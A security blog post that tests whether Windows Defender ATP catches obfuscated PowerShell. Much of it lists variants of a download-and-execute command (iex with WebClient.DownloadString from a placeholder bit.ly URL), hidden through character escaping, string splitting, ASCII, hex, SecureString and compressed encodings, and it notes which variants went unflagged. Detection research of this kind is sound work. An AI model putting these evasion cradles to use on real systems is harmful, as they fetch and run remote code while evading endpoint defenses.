Obfuscating PowerShell Commands

While testing Windows Defender Advanced Threat Protection (WDATP), I ran various PowerShell scripts to invoke certain downloads or specific tasks. As I was doing it, I wondered if it was smart enough to see obfuscated commands. Then I wondered how I could obfuscate them to make it harder to understand.

As an example, I will use the following command line with a made-up URL:

Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/sample")

The command simply retrieves the content at the specified URL and runs it in the current PowerShell session. WDATP easily recognizes the standard command and flags it. What happens if we try a few different obfuscation approaches? The examples below are taken from Daniel Bohannon's RVAsec 2017 slides: http://rvasec.com/slides/2017/Bohannon_Daniel–RVAsec_2017.pptx

Easy Obfuscation

Invoke-Expression (New-Object Net.WebClient).DownloadString("htt" + "ps://" + "bit.ly/sample")

Invoke-Expression (New-Object Net.WebClient).DownloadString('htt' + 'ps://' + 'bit.ly/sample')

Invoke-Expression (New-Object Net.WebClient)."`D`o`wn`l`oa`d`Str`in`g"('htt' + 'ps://' + 'bit.ly/sample')

Medium Obfuscation

Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('htt' + 'ps://' + 'bit.ly/sample')

Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`t")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('htt' + 'ps://' + 'bit.ly/sample')

Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://' + 'bit.ly/sample')

Hard Obfuscation

`I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/sample')

. ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}."`I`N`V`o`k`e`C`o`m`m`A`N`d"). "`N`e`w`S`c`R`i`p`T`B`l`o`c`k"((& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/sample')))

Interestingly, I did not see these get flagged or show up in the console. However, when I ran it this way it did:

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/sample')"

Even using the “Invoke-Obfuscation” framework with something like the following three didn’t raise the alert.

ASCII Encoding

[StRiNg]::JoIn( '' , [ChaR[]](73, 110, 118 ,111,107,101, 45 , 69, 120 ,112, 114 , 101, 115 ,115 , 105,111, 110,32,40,78 , 101 ,119, 45, 79 , 98 ,106 , 101 , 99 ,116, 32 , 83, 121,115 , 116, 101,109 , 46 , 78 , 101 ,116, 46,87,101, 98 ,67 ,108,105,101 , 110, 116,41 , 46, 68 , 111 , 119, 110 ,108 ,111, 97,100 ,83 , 116 , 114, 105 ,110, 103, 40 ,39, 104 ,116 , 116, 112 ,58,47,47 ,98 , 105,116,46 , 108 , 121, 47 , 115, 97, 109 , 112,108, 101 ,39, 41 ))|& ((gv '*MDr*').NamE[3,11,2]-joiN'')

HEX Encoding

&( $sHeLlId[1]+$SHeLLiD[13]+'x')(( ( 49, '6e' , 76, '6f','6b', 65,'2d',45 , 78, 70, 72,65 , 73, 73,69, '6f' , '6e' ,20,28,'4e' ,65 , 77, '2d', '4f' ,62, '6a', 65,63 ,74 , 20 , 53 , 79,73 ,74,65,'6d','2e','4e' , 65 ,74 , '2e' , 57,65, 62,43,'6c' ,69, 65,'6e', 74,29 ,'2e', 44 , '6f' , 77, '6e','6c' , '6f' ,61, 64, 53,74 , 72 ,69 , '6e' , 67, 28, 27, 68 , 74,74, 70 , '3a' , '2f' , '2f',62 , 69, 74 ,'2e' , '6c', 79,'2f' ,73, 61 , '6d' , 70 ,'6c',65, 27, 29)|foreAcH-objeCt {([COnvERT]::tOiNT16(( $_.TOSTrinG()), 16 )-as [chAR])} ) -JOin '')

SecureString (AES) Encoding

.( $PsHOMe[4]+$PsHoMe[34]+'x')(([ruNtiMe.inteROpseRViCes.MaRsHaL]::ptRtoStRinGuNi( [RuNTime.iNTERoPservIcES.marSHAL]::SecureStrinGToGLoBalaLLocuniCoDE($('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'| cOnVeRTTo-secUrestRING -KE (242..227)) )) ))

SecureString (AES) Encoding Compressed

(new-oBJect iO.COMPRESsiOn.deflATESTreAM( [Io.MEMoRyStreAm][SYStEm.convert]::FROmbASE64stRing('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'), [iO.CoMPresSiON.cOMPresSIoNmoDE]::dEcoMPreSs) |fOrEAch{ new-oBJect Io.sTREAmReadER($_ ,[SYSteM.tExT.eNcODinG]::AsciI) } ).readtoEND( ) | & ( ([sTRInG]$VErBOSeprEFerENCE)[1,3]+'x'-Join'')

To learn more about obfuscating PowerShell commands you can use the following links:

https://github.com/danielbohannon/Invoke-Obfuscation
https://www.sans.org/summit-archives/file/summit-archive-1492186586.pdf
https://blog.varonis.com/powershell-obfuscation-stealth-through-confusion-part-i/
https://blog.varonis.com/powershell-obfuscation-stealth-confusion-part-ii/
http://pentestit.com/invoke-obfuscation-powershell-command-script-obfuscator/
https://cobbr.io/ObfuscationDetection.html
https://gallery.technet.microsoft.com/scriptcenter/Generate-obfuscated-string-6ec72ffe

The good news is that if these were more malicious in nature than simply downloading a file, they would be flagged. For example, using this method to download Mimikatz triggers an alert.

Liam Cleary

I began my career as a Trainer of all things computer related. However, I very quickly realized that programming, breaking, and hacking was a lot more fun. I then spent the next few years working on core infrastructure and security services, until I found SharePoint. I am now the founder and owner of SharePlicity, a consulting company that focuses on all areas of Technology. My role within SharePlicity is to help organizations implement technology that will enhance internal and external collaboration, document and records management, automate business processes and of course security controls and protection. I am also an eleven-time Microsoft MVP focusing on Architecture but also cross the boundary into Development. My specialty over the past few years has been security in SharePoint and its surrounding platforms. I can also be found at user groups or conferences speaking, offering advice, spending time in the community, teaching my kids how to code, Raspberry Pi programming, hacking the planet or building Lego robots.
